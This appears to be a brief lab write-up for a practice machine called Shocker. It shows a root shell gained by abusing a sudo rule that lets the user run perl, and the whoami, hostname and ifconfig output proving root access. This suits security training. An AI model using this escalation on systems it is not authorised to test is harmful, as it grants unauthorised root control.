InfoSec LAB

Shocker_Privilege_Escalation

Created: 1 min read

perl

I discovered that the shelly user has sudo privileges to execute /usr/bin/perl, which can be abused to gain privilege escalation

shelly@shocker:/home/shelly$ sudo -u root /usr/bin/perl -e 'exec "/bin/sh";'  
# whoami
whoami
root
# hostname
hostname
Shocker
# ifconfig
ifconfig
ens192    link encap:Ethernet  HWaddr 00:50:56:b9:89:cf  
          inet addr:10.10.10.56  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: dead:beef::250:56ff:feb9:89cf/64 Scope:Global
          inet6 addr: fe80::250:56ff:feb9:89cf/64 Scope:Link
          up broadcast running multicast  mtu:1500  Metric:1
          rx packets:1956 errors:0 dropped:0 overruns:0 frame:0
          tx packets:1910 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          rx bytes:1793609 (1.7 MB)  TX bytes:1117402 (1.1 MB)
 
lo        link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          up loopback running  mtu:65536  Metric:1
          rx packets:4360 errors:0 dropped:0 overruns:0 frame:0
          tx packets:4360 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          rx bytes:324428 (324.4 KB)  TX bytes:324428 (324.4 KB)

System Level Compromise

Interactive Graph View

Backlinks